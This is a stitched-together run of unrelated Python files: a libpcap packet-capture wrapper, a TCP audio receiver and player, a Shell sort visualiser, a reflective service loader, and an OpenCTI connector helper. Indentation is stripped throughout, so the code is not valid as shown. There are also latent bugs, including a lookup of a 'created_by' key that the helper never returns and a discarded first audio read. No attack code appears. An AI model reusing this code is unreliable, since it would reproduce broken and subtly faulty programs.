raise LinkLayerCaptureError(f"Could not instantiate pcap_t for {device!r}: {err_buf.value.decode()}")
try:
# Non-fatal errors are intentionally logged at a low severity level to not disturb the user unnecessarily.
err = pcap.set_snaplen(pd, _SNAPSHOT_LENGTH)
if err != 0:
_logger.info("Could not set snapshot length for %r: %r", device, status_to_str(err))
err = pcap.set_timeout(pd, int(_BUFFER_TIMEOUT * 1e3))
if err != 0:
_logger.info("Could not set timeout for %r: %r", device, status_to_str(err))
err = pcap.set_promisc(pd, 1)
if err != 0:
_logger.info("Could not enable promiscuous mode for %r: %r", device, status_to_str(err))
err = pcap.activate(pd)
if err in (pcap.PCAP_ERROR_PERM_DENIED, pcap.PCAP_ERROR_PROMISC_PERM_DENIED):
raise PermissionError(f"Capture is not permitted on {device!r}: {status_to_str(err)}")
if err == pcap.PCAP_ERROR_IFACE_NOT_UP:
_logger.debug("Device %r is not capturable because the iface is not up. %s", device, status_to_str(err))
pcap.close(pd)
return None
if err < 0:
_logger.info(
"Could not activate capture on %r: %s; %s", device, status_to_str(err), pcap.geterr(pd).decode()
)
pcap.close(pd)
return None
if err > 0:
_logger.info(
"Capture on %r started successfully, but libpcap reported a warning: %s", device, status_to_str(err)
)
# https://www.tcpdump.org/manpages/pcap_set_datalink.3pcap.html
for dlt in data_link_hints:
err = pcap.set_datalink(pd, dlt)
if err == 0:
_logger.debug("Device %r is configured to use the data link type %r", device, dlt)
break
else:
_logger.debug(
"Device %r supports none of the following data link types: %r. Last error was: %s",
device,
list(data_link_hints),
pcap.geterr(pd).decode(),
)
# https://www.tcpdump.org/manpages/pcap_compile.3pcap.html
code = pcap.bpf_program() # This memory needs to be freed when closed. Fix it later.
err = pcap.compile(pd, ctypes.byref(code), filter_expression.encode(), 1, pcap.PCAP_NETMASK_UNKNOWN)
if err != 0:
raise LinkLayerCaptureError(
f"Could not compile filter expression {filter_expression!r}: {status_to_str(err)}; "
f"{pcap.geterr(pd).decode()}"
)
err = pcap.setfilter(pd, ctypes.byref(code))
if err != 0:
raise LinkLayerCaptureError(f"Could not install filter: {status_to_str(err)}; {pcap.geterr(pd).decode()}")
except Exception:
pcap.close(pd)
raise
return typing.cast(object, pd)
_SNAPSHOT_LENGTH = 65535
"""
The doc says: "A snapshot length of 65535 should be sufficient, on most if not all networks,
to capture all the data available from the packet."
"""
_BUFFER_TIMEOUT = 0.005
"""
See "packet buffer timeout" in https://www.tcpdump.org/manpages/pcap.3pcap.html.
This value should be sensible for any kind of real-time monitoring application.
"""
def _apply_windows_workarounds() -> None: # pragma: no cover
import os
import pathlib
import importlib.util
# This is a Windows Server-specific workaround for this libpcap issue: https://github.com/karpierz/libpcap/issues/7
# tl;dr: It works on desktop Windows 8/10, but Windows Server 2019 is unable to find "wpcap.dll" unless the
# DLL search path is specified manually via PATH. The workaround is valid per libpcap==1.10.0b15.
# Later versions of libpcap may not require it, so please consider removing it in the future.
spec = importlib.util.find_spec("libpcap")
if spec and spec.origin:
is_64_bit = sys.maxsize.bit_length() > 32
libpcap_dir = pathlib.Path(spec.origin).parent
dll_path = libpcap_dir / "_platform" / "_windows" / ("x64" if is_64_bit else "x86") / "wpcap"
os.environ["PATH"] += os.pathsep + str(dll_path)
if sys.platform.startswith("win"): # pragma: no cover
_apply_windows_workarounds()
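# A minimal usage sketch (the filter expression and the print-based handler are
# illustrative only; the callback is invoked from worker threads, so real
# handlers must synchronize access to shared state):
#   def on_capture(cap: LinkLayerCapture) -> None:
#       print(cap.timestamp, cap.device_name, cap.packet)
#   sniffer = LinkLayerSniffer("udp and dst port 16383", on_capture)
#   ...                                        # captures are delivered in the background
#   sniffer.close()                            # hint the worker threads to terminate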
|
receive_audio.py
|
from root import *
import pyaudio
import time
import redis
# Audio info
CHUNK = 1024
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = 16000
SILENCE = b"\x00" * CHUNK * 2  # one chunk of 16-bit silence (2 bytes per sample)
# Buffers and locks
audio_buffer = b""
audio_buffer_lock = threading.Lock()
# Connection info
parallel_connections = 10
def new_connection(ip):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # TCP socket
port = 12346
s.connect((ip, port))
return s
def receive_audio(s: socket.socket, r):
audio_data = s.recv(CHUNK)
    while True:  # TODO: decide whether to stop on an empty recv() instead of looping forever
global audio_buffer
try:
audio_data = s.recv(CHUNK)
audio_buffer_lock.acquire()
audio_buffer += audio_data
audio_buffer_lock.release()
except socket.error:
print("Audio receiver : Server disconnected.")
break
status = r.get("status").decode("utf-8")
if status != "call":
s.shutdown(socket.SHUT_RDWR)
s.close()
break
class ReceiveAudioFrameThread(threading.Thread):
def __init__(self, thread_id, name, counter, correspondent_ip, r: redis.Redis):
threading.Thread.__init__(self)
self.threadID = thread_id
self.name = name
self.counter = counter
self.correspondent_ip = correspondent_ip
self.r = r
def run(self) -> None:
threads = []
for i in range(parallel_connections):
s = new_connection(self.correspondent_ip)
new_thread = threading.Thread(target=receive_audio, args=(s, self.r, ))
new_thread.start()
threads.append(new_thread)
        print('Audio receiver : Connection established for audio.')
        for th in threads:
            th.join()
        print("Exiting audio receiving thread.")
class PlayAudioThread(threading.Thread):
def __init__(self, thread_id, name, counter, r: redis.Redis):
threading.Thread.__init__(self)
self.threadID = thread_id
self.name = name
self.counter = counter
self.r = r
def run(self) -> None:
        p = pyaudio.PyAudio()  # TODO: fix the device-open failure (only happens when not using localhost)
print("Audio player : Audio device opened.")
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
output=True,
frames_per_buffer=CHUNK)
print("Audio player : Audio stream opened.")
stream.start_stream()
print("Audio player : Audio stream started.")
last_chunk = None
while True:
global audio_buffer
# In case audio is off
show_audio = self.r.get("show_audio").decode("utf-8")
if show_audio == "FALSE":
stream.write(SILENCE)
audio_buffer_lock.acquire()
                audio_buffer = b""  # reset to empty bytes, matching the buffer type
audio_buffer_lock.release()
time.sleep(CHUNK / RATE * 0.5)
continue
free = stream.get_write_available()
chunks = int(math.ceil(free/CHUNK))
if len(audio_buffer) >= chunks*CHUNK:
audio_buffer_lock.acquire()
last_chunk = audio_buffer[:chunks*CHUNK]
stream.write(audio_buffer[:chunks*CHUNK])
audio_buffer = audio_buffer[CHUNK*chunks:]
audio_buffer_lock.release()
elif len(audio_buffer) >= CHUNK:
chunks = len(audio_buffer)//CHUNK
audio_buffer_lock.acquire()
last_chunk = audio_buffer[:chunks * CHUNK]
stream.write(audio_buffer[:chunks * CHUNK])
audio_buffer = audio_buffer[CHUNK * chunks:]
audio_buffer_lock.release()
elif last_chunk is not None:
stream.write(last_chunk)
# else:
# # We write silence
# stream.write(SILENCE)
# time.sleep(CHUNK/RATE)
# Just for debugging (to see if we are having under runs)
# else:
# print("Audio player : Buffer under-run (len of buffer < chunk * 10).")
stream.stop_stream()
stream.close()
p.terminate()
print("Audio playing thread terminated.")
|
ShellSort.py
|
from Algorithims import Algorithms
import time
import threading
class ShellSort(Algorithms):
def __init__(self, data, delay):
Algorithms.__init__(self)
self.data = data
self.delay = delay
sorting_thread = threading.Thread(target=self.sort, args=(self.data, self.drawData, self.delay))
sorting_thread.daemon = True
sorting_thread.start()
self.mainloop()
def sort(self, data, drawData, delay):
n = len(data)
gap = n // 2
while gap > 0:
for i in range(gap, n):
temp = data[i]
j = i
while j >= gap and data[j - gap] > temp:
data[j] = data[j - gap]
drawData(data, ["red" if x == j or x == j - gap else "white" for x in range(len(data))])
time.sleep(delay)
j -= gap
data[j] = temp
drawData(data, ["red" if x == j or x == i - gap else "white" for x in range(len(data))])
time.sleep(delay)
gap //= 2
drawData(data, ["green" for x in range(len(data))])
|
ServiceManager.py
|
import threading
import importlib
from core.Service import Service
class ServiceManager:
def __init__(self, core, config):
self.core = core
self.services = {}
self.readConfigFile(config)
def readConfigFile(self, config):
for sectionName in config.sections():
indexOfLastPoint = sectionName.rfind('.')
indexOfEqual = sectionName.rfind('=')
serviceId = sectionName[0:indexOfEqual]
moduleName = sectionName[indexOfEqual + 1:indexOfLastPoint]
className = sectionName[indexOfLastPoint + 1:len(sectionName)]
self.instantiateService(moduleName, className, serviceId)
def instantiateService(self, module_name, class_name, service_id):
self.core.logger.log("Instantiating Module: " + module_name + ", Class: " + class_name + ", ID: " + service_id)
reflectedModule = importlib.import_module(module_name)
reflectedClass = getattr(reflectedModule, class_name)
serviceInstance = reflectedClass()
self.addService(serviceInstance, service_id)
def addService(self, service, service_id):
        if not issubclass(type(service), Service):
            raise Exception('Class \'' + type(service).__name__ + '\' does not extend from \'' + Service.__name__ + '\'')
        elif service_id in self.services:
            raise Exception('Service ID \'' + service_id + '\' already exists.')
service.core = self.core
service.id = service_id
self.services[service_id] = service
def initializeServices(self):
for service in self.services.values():
initservicethread = threading.Thread(target=service.initialize)
initservicethread.start()
def startServices(self):
for service in self.services.values():
startservicethread = threading.Thread(target=service.start)
startservicethread.start()
|
opencti_connector_helper.py
|
import base64
import datetime
import json
import logging
import os
import ssl
import sys
import threading
import time
import uuid
from typing import Callable, Dict, List, Optional, Union
import pika
from pika.exceptions import NackError, UnroutableError
from sseclient import SSEClient
from pycti.api.opencti_api_client import OpenCTIApiClient
from pycti.connector.opencti_connector import OpenCTIConnector
from pycti.utils.opencti_stix2_splitter import OpenCTIStix2Splitter
TRUTHY: List[str] = ["yes", "true", "True"]
FALSY: List[str] = ["no", "false", "False"]
def get_config_variable(
env_var: str,
yaml_path: List,
config: Dict = {},
isNumber: Optional[bool] = False,
default=None,
) -> Union[bool, int, None, str]:
"""[summary]
:param env_var: environnement variable name
:param yaml_path: path to yaml config
:param config: client config dict, defaults to {}
:param isNumber: specify if the variable is a number, defaults to False
"""
if os.getenv(env_var) is not None:
result = os.getenv(env_var)
elif yaml_path is not None:
if yaml_path[0] in config and yaml_path[1] in config[yaml_path[0]]:
result = config[yaml_path[0]][yaml_path[1]]
else:
return default
else:
return default
if result in TRUTHY:
return True
if result in FALSY:
return False
if isNumber:
return int(result)
return result
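# Hedged example of the lookup order implemented above (environment variable first, then the YAML
# path, then the default); the variable name and values are illustrative only:
#   os.environ["CONNECTOR_LOG_LEVEL"] = "info"
#   get_config_variable("CONNECTOR_LOG_LEVEL", ["connector", "log_level"],
#                       {"connector": {"log_level": "error"}})      # -> "info"
#   # without the environment variable it would return "error", and with neither present
#   # it would return the supplied default (None unless overridden).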
def create_ssl_context() -> ssl.SSLContext:
"""Set strong SSL defaults: require TLSv1.2+
`ssl` uses bitwise operations to specify context `<enum 'Options'>`
"""
ssl_context_options: List[int] = [
ssl.OP_NO_COMPRESSION,
ssl.OP_NO_TICKET, # pylint: disable=no-member
ssl.OP_NO_RENEGOTIATION, # pylint: disable=no-member
ssl.OP_SINGLE_DH_USE,
ssl.OP_SINGLE_ECDH_USE,
]
ssl_context = ssl.create_default_context(purpose=ssl.Purpose.SERVER_AUTH)
ssl_context.options &= ~ssl.OP_ENABLE_MIDDLEBOX_COMPAT # pylint: disable=no-member
ssl_context.verify_mode = ssl.CERT_REQUIRED
ssl_context.minimum_version = ssl.TLSVersion.TLSv1_2
for option in ssl_context_options:
ssl_context.options |= option
return ssl_context
class ListenQueue(threading.Thread):
"""Main class for the ListenQueue used in OpenCTIConnectorHelper
    :param helper: instance of the `OpenCTIConnectorHelper` class
:type helper: OpenCTIConnectorHelper
:param config: dict containing client config
:type config: Dict
:param callback: callback function to process queue
:type callback: callable
"""
def __init__(self, helper, config: Dict, callback) -> None:
threading.Thread.__init__(self)
self.pika_credentials = None
self.pika_parameters = None
self.pika_connection = None
self.channel = None
self.helper = helper
self.callback = callback
self.host = config["connection"]["host"]
self.use_ssl = config["connection"]["use_ssl"]
self.port = config["connection"]["port"]
self.user = config["connection"]["user"]
self.password = config["connection"]["pass"]
self.queue_name = config["listen"]
self.exit_event = threading.Event()
self.thread = None
# noinspection PyUnusedLocal
def _process_message(self, channel, method, properties, body) -> None:
"""process a message from the rabbit queue
:param channel: channel instance
:type channel: callable
:param method: message methods
:type method: callable
:param properties: unused
:type properties: str
:param body: message body (data)
:type body: str or bytes or bytearray
"""
json_data = json.loads(body)
self.thread = threading.Thread(target=self._data_handler, args=[json_data])
self.thread.start()
while self.thread.is_alive(): # Loop while the thread is processing
assert self.pika_connection is not None
self.pika_connection.sleep(1.0)
logging.info(
"%s",
(
f"Message (delivery_tag={method.delivery_tag}) processed"
", thread terminated"
),
)
channel.basic_ack(delivery_tag=method.delivery_tag)
def _data_handler(self, json_data) -> None:
# Set the API headers
work_id = json_data["internal"]["work_id"]
applicant_id = json_data["internal"]["applicant_id"]
self.helper.work_id = work_id
if applicant_id is not None:
self.helper.applicant_id = applicant_id
self.helper.api.set_applicant_id_header(applicant_id)
# Execute the callback
try:
self.helper.api.work.to_received(
work_id, "Connector ready to process the operation"
)
message = self.callback(json_data["event"])
self.helper.api.work.to_processed(work_id, message)
except Exception as e: # pylint: disable=broad-except
logging.exception("Error in message processing, reporting error to API")
try:
self.helper.api.work.to_processed(work_id, str(e), True)
except: # pylint: disable=bare-except
logging.error("Failing reporting the processing")
def run(self) -> None:
while not self.exit_event.is_set():
try:
# Connect the broker
self.pika_credentials = pika.PlainCredentials(self.user, self.password)
self.pika_parameters = pika.ConnectionParameters(
host=self.host,
port=self.port,
virtual_host="/",
credentials=self.pika_credentials,
ssl_options=pika.SSLOptions(create_ssl_context(), self.host)
if self.use_ssl
else None,
)
self.pika_connection = pika.BlockingConnection(self.pika_parameters)
self.channel = self.pika_connection.channel()
assert self.channel is not None
self.channel.basic_consume(
queue=self.queue_name, on_message_callback=self._process_message
)
self.channel.start_consuming()
except (KeyboardInterrupt, SystemExit):
self.helper.log_info("Connector stop")
sys.exit(0)
except Exception as e: # pylint: disable=broad-except
self.helper.log_error(str(e))
time.sleep(10)
def stop(self):
self.exit_event.set()
if self.thread:
self.thread.join()
class PingAlive(threading.Thread):
def __init__(self, connector_id, api, get_state, set_state) -> None:
threading.Thread.__init__(self)
self.connector_id = connector_id
self.in_error = False
self.api = api
self.get_state = get_state
self.set_state = set_state
self.exit_event = threading.Event()
def ping(self) -> None:
while not self.exit_event.is_set():
try:
initial_state = self.get_state()
result = self.api.connector.ping(self.connector_id, initial_state)
remote_state = (
json.loads(result["connector_state"])
if result["connector_state"] is not None
and len(result["connector_state"]) > 0
else None
)
if initial_state != remote_state:
self.set_state(result["connector_state"])
logging.info(
"%s",
(
"Connector state has been remotely reset to: "
f'"{self.get_state()}"'
),
)
if self.in_error:
self.in_error = False
logging.error("API Ping back to normal")
except Exception: # pylint: disable=broad-except
self.in_error = True
logging.error("Error pinging the API")
self.exit_event.wait(40)
def run(self) -> None:
logging.info("Starting ping alive thread")
self.ping()
def stop(self) -> None:
logging.info("Preparing for clean shutdown")
self.exit_event.set()
class ListenStream(threading.Thread):
def __init__(
self, helper, callback, url, token, verify_ssl, start_timestamp, live_stream_id
) -> None:
threading.Thread.__init__(self)
self.helper = helper
self.callback = callback
self.url = url
self.token = token
self.verify_ssl = verify_ssl
self.start_timestamp = start_timestamp
self.live_stream_id = live_stream_id
self.exit = False
def run(self) -> None: # pylint: disable=too-many-branches
current_state = self.helper.get_state()
if current_state is None:
current_state = {
"connectorLastEventId": f"{self.start_timestamp}-0"
if self.start_timestamp is not None and len(self.start_timestamp) > 0
else "-"
}
self.helper.set_state(current_state)
# If URL and token are provided, likely consuming a remote stream
if self.url is not None and self.token is not None:
            # If a live stream ID is set, append it to the URL
if self.live_stream_id is not None:
live_stream_uri = f"/{self.live_stream_id}"
elif self.helper.connect_live_stream_id is not None:
live_stream_uri = f"/{self.helper.connect_live_stream_id}"
else:
live_stream_uri = ""
# Live stream "from" should be empty if start from the beginning
if (
self.live_stream_id is not None
or self.helper.connect_live_stream_id is not None
):
live_stream_from = (
f"?from={current_state['connectorLastEventId']}"
if current_state["connectorLastEventId"] != "-"
else ""
)
# Global stream "from" should be 0 if starting from the beginning
else:
live_stream_from = "?from=" + (
current_state["connectorLastEventId"]
if current_state["connectorLastEventId"] != "-"
else "0"
)
live_stream_url = f"{self.url}/stream{live_stream_uri}{live_stream_from}"
opencti_ssl_verify = (
self.verify_ssl if self.verify_ssl is not None else True
)
logging.info(
"%s",
(
"Starting listening stream events (URL: "
f"{live_stream_url}, SSL verify: {opencti_ssl_verify})"
),
)
messages = SSEClient(
live_stream_url,
headers={"authorization": "Bearer " + self.token},
verify=opencti_ssl_verify,
)
else:
live_stream_uri = (
f"/{self.helper.connect_live_stream_id}"
if self.helper.connect_live_stream_id is not None
else ""
)
if self.helper.connect_live_stream_id is not None:
live_stream_from = (
f"?from={current_state['connectorLastEventId']}"
if current_state["connectorLastEventId"] != "-"
else ""
)
# Global stream "from" should be 0 if starting from the beginning
else:
live_stream_from = "?from=" + (
current_state["connectorLastEventId"]
if current_state["connectorLastEventId"] != "-"
else "0"
)
live_stream_url = (
f"{self.helper.opencti_url}/stream{live_stream_uri}{live_stream_from}"
)
logging.info(
"%s",
(
f"Starting listening stream events (URL: {live_stream_url}"
f", SSL verify: {self.helper.opencti_ssl_verify})"
),
)
messages = SSEClient(
live_stream_url,
headers={"authorization": "Bearer " + self.helper.opencti_token},
verify=self.helper.opencti_ssl_verify,
)
# Iter on stream messages
for msg in messages:
if self.exit:
break
if msg.event == "heartbeat" or msg.event == "connected":
continue
if msg.event == "sync":
if msg.id is not None:
state = self.helper.get_state()
state["connectorLastEventId"] = str(msg.id)
self.helper.set_state(state)
else:
self.callback(msg)
if msg.id is not None:
state = self.helper.get_state()
state["connectorLastEventId"] = str(msg.id)
self.helper.set_state(state)
def stop(self):
self.exit = True
class OpenCTIConnectorHelper: # pylint: disable=too-many-public-methods
"""Python API for OpenCTI connector
:param config: dict standard config
:type config: Dict
"""
def __init__(self, config: Dict) -> None:
# Load API config
self.opencti_url = get_config_variable(
"OPENCTI_URL", ["opencti", "url"], config
)
self.opencti_token = get_config_variable(
"OPENCTI_TOKEN", ["opencti", "token"], config
)
self.opencti_ssl_verify = get_config_variable(
"OPENCTI_SSL_VERIFY", ["opencti", "ssl_verify"], config, False, True
)
# Load connector config
self.connect_id = get_config_variable(
"CONNECTOR_ID", ["connector", "id"], config
)
self.connect_type = get_config_variable(
"CONNECTOR_TYPE", ["connector", "type"], config
)
self.connect_live_stream_id = get_config_variable(
"CONNECTOR_LIVE_STREAM_ID",
["connector", "live_stream_id"],
config,
False,
None,
)
self.connect_name = get_config_variable(
"CONNECTOR_NAME", ["connector", "name"], config
)
self.connect_confidence_level = get_config_variable(
"CONNECTOR_CONFIDENCE_LEVEL",
["connector", "confidence_level"],
config,
True,
)
self.connect_scope = get_config_variable(
"CONNECTOR_SCOPE", ["connector", "scope"], config
)
self.connect_auto = get_config_variable(
"CONNECTOR_AUTO", ["connector", "auto"], config, False, False
)
self.connect_only_contextual = get_config_variable(
"CONNECTOR_ONLY_CONTEXTUAL",
["connector", "only_contextual"],
config,
False,
False,
)
self.log_level = get_config_variable(
"CONNECTOR_LOG_LEVEL", ["connector", "log_level"], config
)
self.connect_run_and_terminate = get_config_variable(
"CONNECTOR_RUN_AND_TERMINATE",
["connector", "run_and_terminate"],
config,
False,
False,
)
# Configure logger
numeric_level = getattr(
logging, self.log_level.upper() if self.log_level else "INFO", None
)
if not isinstance(numeric_level, int):
raise ValueError(f"Invalid log level: {self.log_level}")
logging.basicConfig(level=numeric_level)
# Initialize configuration
self.api = OpenCTIApiClient(
self.opencti_url, self.opencti_token, self.log_level
)
# Register the connector in OpenCTI
self.connector = OpenCTIConnector(
self.connect_id,
self.connect_name,
self.connect_type,
self.connect_scope,
self.connect_auto,
self.connect_only_contextual,
)
connector_configuration = self.api.connector.register(self.connector)
logging.info("%s", f"Connector registered with ID: {self.connect_id}")
self.connector_id = connector_configuration["id"]
self.work_id = None
self.applicant_id = connector_configuration["connector_user"]["id"]
self.connector_state = connector_configuration["connector_state"]
self.config = connector_configuration["config"]
# Start ping thread
if not self.connect_run_and_terminate:
self.ping = PingAlive(
self.connector.id, self.api, self.get_state, self.set_state
)
self.ping.start()
# self.listen_stream = None
self.listen_queue = None
def stop(self) -> None:
if self.listen_queue:
self.listen_queue.stop()
# if self.listen_stream:
# self.listen_stream.stop()
self.ping.stop()
self.api.connector.unregister(self.connector_id)
def get_name(self) -> Optional[Union[bool, int, str]]:
return self.connect_name
def get_only_contextual(self) -> Optional[Union[bool, int, str]]:
return self.connect_only_contextual
def set_state(self, state) -> None:
"""sets the connector state
:param state: state object
:type state: Dict
"""
self.connector_state = json.dumps(state)
def get_state(self) -> Optional[Dict]:
"""get the connector state
:return: returns the current state of the connector if there is any
:rtype:
"""
try:
if self.connector_state:
state = json.loads(self.connector_state)
                if isinstance(state, dict) and state:
return state
except: # pylint: disable=bare-except
pass
return None
def listen(self, message_callback: Callable[[Dict], str]) -> None:
"""listen for messages and register callback function
:param message_callback: callback function to process messages
:type message_callback: Callable[[Dict], str]
"""
self.listen_queue = ListenQueue(self, self.config, message_callback)
self.listen_queue.start()
def listen_stream(
self,
message_callback,
url=None,
token=None,
verify_ssl=None,
start_timestamp=None,
live_stream_id=None,
) -> ListenStream:
"""listen for messages and register callback function
:param message_callback: callback function to process messages
"""
self.listen_stream = ListenStream(
self,
message_callback,
url,
token,
verify_ssl,
start_timestamp,
live_stream_id,
)
self.listen_stream.start()
return self.listen_stream
def get_opencti_url(self) -> Optional[Union[bool, int, str]]:
return self.opencti_url
def get_opencti_token(self) -> Optional[Union[bool, int, str]]:
return self.opencti_token
def get_connector(self) -> OpenCTIConnector:
return self.connector
def log_error(self, msg: str) -> None:
logging.error(msg)
def log_info(self, msg: str) -> None:
logging.info(msg)
def log_debug(self, msg: str) -> None:
logging.debug(msg)
def log_warning(self, msg: str) -> None:
logging.warning(msg)
def date_now(self) -> str:
"""get the current date (UTC)
:return: current datetime for utc
:rtype: str
"""
return (
datetime.datetime.utcnow()
.replace(microsecond=0, tzinfo=datetime.timezone.utc)
.isoformat()
)
# Push Stix2 helper
def send_stix2_bundle(self, bundle, **kwargs) -> list:
"""send a stix2 bundle to the API
:param work_id: a valid work id
:param bundle: valid stix2 bundle
:type bundle:
:param entities_types: list of entities, defaults to None
:type entities_types: list, optional
        :param update: whether to update data in the database, defaults to False
:type update: bool, optional
:raises ValueError: if the bundle is empty
:return: list of bundles
:rtype: list
"""
work_id = kwargs.get("work_id", self.work_id)
entities_types = kwargs.get("entities_types", None)
update = kwargs.get("update", False)
event_version = kwargs.get("event_version", None)
if entities_types is None:
entities_types = []
stix2_splitter = OpenCTIStix2Splitter()
bundles = stix2_splitter.split_bundle(bundle, True, event_version)
if len(bundles) == 0:
raise ValueError("Nothing to import")
if work_id is not None:
self.api.work.add_expectations(work_id, len(bundles))
pika_credentials = pika.PlainCredentials(
self.config["connection"]["user"], self.config["connection"]["pass"]
)
pika_parameters = pika.ConnectionParameters(
host=self.config["connection"]["host"],
port=self.config["connection"]["port"],
virtual_host="/",
credentials=pika_credentials,
ssl_options=pika.SSLOptions(
create_ssl_context(), self.config["connection"]["host"]
)
if self.config["connection"]["use_ssl"]
else None,
)
pika_connection = pika.BlockingConnection(pika_parameters)
channel = pika_connection.channel()
for sequence, bundle in enumerate(bundles, start=1):
self._send_bundle(
channel,
bundle,
work_id=work_id,
entities_types=entities_types,
sequence=sequence,
update=update,
)
channel.close()
return bundles
def _send_bundle(self, channel, bundle, **kwargs) -> None:
"""send a STIX2 bundle to RabbitMQ to be consumed by workers
:param channel: RabbitMQ channel
:type channel: callable
:param bundle: valid stix2 bundle
:type bundle:
:param entities_types: list of entity types, defaults to None
:type entities_types: list, optional
:param update: whether to update data in the database, defaults to False
:type update: bool, optional
"""
work_id = kwargs.get("work_id", None)
sequence = kwargs.get("sequence", 0)
update = kwargs.get("update", False)
entities_types = kwargs.get("entities_types", None)
if entities_types is None:
entities_types = []
# Validate the STIX 2 bundle
# validation = validate_string(bundle)
# if not validation.is_valid:
# raise ValueError('The bundle is not a valid STIX2 JSON')
# Prepare the message
# if self.current_work_id is None:
# raise ValueError('The job id must be specified')
message = {
"applicant_id": self.applicant_id,
"action_sequence": sequence,
"entities_types": entities_types,
"content": base64.b64encode(bundle.encode("utf-8")).decode("utf-8"),
"update": update,
}
if work_id is not None:
message["work_id"] = work_id
# Send the message
try:
routing_key = "push_routing_" + self.connector_id
channel.basic_publish(
exchange=self.config["push_exchange"],
routing_key=routing_key,
body=json.dumps(message),
properties=pika.BasicProperties(
delivery_mode=2, # make message persistent
),
)
logging.info("Bundle has been sent")
except (UnroutableError, NackError) as e:
logging.error("Unable to send bundle, retry...%s", e)
self._send_bundle(channel, bundle, **kwargs)
def split_stix2_bundle(self, bundle) -> list:
"""splits a valid stix2 bundle into a list of bundles
:param bundle: valid stix2 bundle
:type bundle:
:raises Exception: if data is not valid JSON
:return: returns a list of bundles
:rtype: list
"""
self.cache_index = {}
self.cache_added = []
try:
bundle_data = json.loads(bundle)
except Exception as e:
raise Exception("File data is not a valid JSON") from e
# validation = validate_parsed_json(bundle_data)
# if not validation.is_valid:
# raise ValueError('The bundle is not a valid STIX2 JSON:' + bundle)
# Index all objects by id
for item in bundle_data["objects"]:
self.cache_index[item["id"]] = item
bundles = []
# Reports must be handled because of object_refs
for item in bundle_data["objects"]:
if item["type"] == "report":
items_to_send = self.stix2_deduplicate_objects(
self.stix2_get_report_objects(item)
)
for item_to_send in items_to_send:
self.cache_added.append(item_to_send["id"])
bundles.append(self.stix2_create_bundle(items_to_send))
# Relationships not added in previous reports
for item in bundle_data["objects"]:
if item["type"] == "relationship" and item["id"] not in self.cache_added:
items_to_send = self.stix2_deduplicate_objects(
self.stix2_get_relationship_objects(item)
)
for item_to_send in items_to_send:
self.cache_added.append(item_to_send["id"])
bundles.append(self.stix2_create_bundle(items_to_send))
# Entities not added in previous reports and relationships
for item in bundle_data["objects"]:
if item["type"] != "relationship" and item["id"] not in self.cache_added:
items_to_send = self.stix2_deduplicate_objects(
self.stix2_get_entity_objects(item)
)
for item_to_send in items_to_send:
self.cache_added.append(item_to_send["id"])
bundles.append(self.stix2_create_bundle(items_to_send))
return bundles
def stix2_get_embedded_objects(self, item) -> Dict:
"""gets created and marking refs for a stix2 item
:param item: valid stix2 item
:type item:
:return: returns a dict of created_by of object_marking_refs
:rtype: Dict
"""
# Marking definitions
object_marking_refs = []
if "object_marking_refs" in item:
for object_marking_ref in item["object_marking_refs"]:
if object_marking_ref in self.cache_index:
object_marking_refs.append(self.cache_index[object_marking_ref])
# Created by ref
created_by_ref = None
if "created_by_ref" in item and item["created_by_ref"] in self.cache_index:
created_by_ref = self.cache_index[item["created_by_ref"]]
return {
"object_marking_refs": object_marking_refs,
"created_by_ref": created_by_ref,
}
def stix2_get_entity_objects(self, entity) -> list:
"""process a stix2 entity
:param entity: valid stix2 entity
:type entity:
:return: entity objects as list
:rtype: list
"""
items = [entity]
# Get embedded objects
embedded_objects = self.stix2_get_embedded_objects(entity)
# Add created by ref
if embedded_objects["created_by_ref"] is not None:
items.append(embedded_objects["created_by_ref"])
# Add marking definitions
if len(embedded_objects["object_marking_refs"]) > 0:
items = items + embedded_objects["object_marking_refs"]
return items
def stix2_get_relationship_objects(self, relationship) -> list:
"""get a list of relations for a stix2 relationship object
:param relationship: valid stix2 relationship
:type relationship:
:return: list of relations objects
:rtype: list
"""
items = [relationship]
# Get source ref
if relationship["source_ref"] in self.cache_index:
items.append(self.cache_index[relationship["source_ref"]])
# Get target ref
if relationship["target_ref"] in self.cache_index:
items.append(self.cache_index[relationship["target_ref"]])
# Get embedded objects
embedded_objects = self.stix2_get_embedded_objects(relationship)
# Add created by ref
if embedded_objects["created_by"] is not None:
items.append(embedded_objects["created_by"])
# Add marking definitions
if len(embedded_objects["object_marking_refs"]) > 0:
items = items + embedded_objects["object_marking_refs"]
return items
def stix2_get_report_objects(self, report) -> list:
"""get a list of items for a stix2 report object
:param report: valid stix2 report object
:type report:
:return: list of items for a stix2 report object
:rtype: list
"""
items = [report]
# Add all object refs
for object_ref in report["object_refs"]:
items.append(self.cache_index[object_ref])
for item in items:
if item["type"] == "relationship":
items = items + self.stix2_get_relationship_objects(item)
else:
items = items + self.stix2_get_entity_objects(item)
return items
@staticmethod
def stix2_deduplicate_objects(items) -> list:
"""deduplicate stix2 items
:param items: valid stix2 items
:type items:
:return: de-duplicated list of items
:rtype: list
"""
ids = []
final_items = []
for item in items:
if item["id"] not in ids:
final_items.append(item)
ids.append(item["id"])
return final_items
@staticmethod
def stix2_create_bundle(items) -> Optional[str]:
"""create a stix2 bundle with items
:param items: valid stix2 items
:type items:
:return: JSON of the stix2 bundle
:rtype:
"""
bundle = {
"type": "bundle",
"id": f"bundle--{uuid.uuid4()}",
"spec_version": "2.0",
"objects": items,
}
return json.dumps(bundle)
@staticmethod
def check_max_tlp(tlp: str, max_tlp: str) -> bool:
"""check the allowed TLP levels for a TLP string
:param tlp: string for TLP level to check
:type tlp: str
:param max_tlp: the highest allowed TLP level
:type max_tlp: str
:return: TLP level in allowed TLPs
:rtype: bool
"""
allowed_tlps: Dict[str, List[str]] = {
"TLP:RED": ["TLP:WHITE", "TLP:GREEN", "TLP:AMBER", "TLP:RED"],
"TLP:AMBER": ["TLP:WHITE", "TLP:GREEN", "TLP:AMBER"],
"TLP:GREEN": ["TLP:WHITE", "TLP:GREEN"],
"TLP:WHITE": ["TLP:WHITE"],
}
return tlp in allowed_tlps[max_tlp]
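# Hedged usage sketch for check_max_tlp (not a required part of a connector's flow): a connector
# configured with a maximum TLP can use it to gate what it imports or sends.
#   OpenCTIConnectorHelper.check_max_tlp("TLP:GREEN", "TLP:AMBER")  # True  - GREEN is allowed under an AMBER ceiling
#   OpenCTIConnectorHelper.check_max_tlp("TLP:AMBER", "TLP:GREEN")  # False - AMBER exceeds a GREEN ceiling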
|
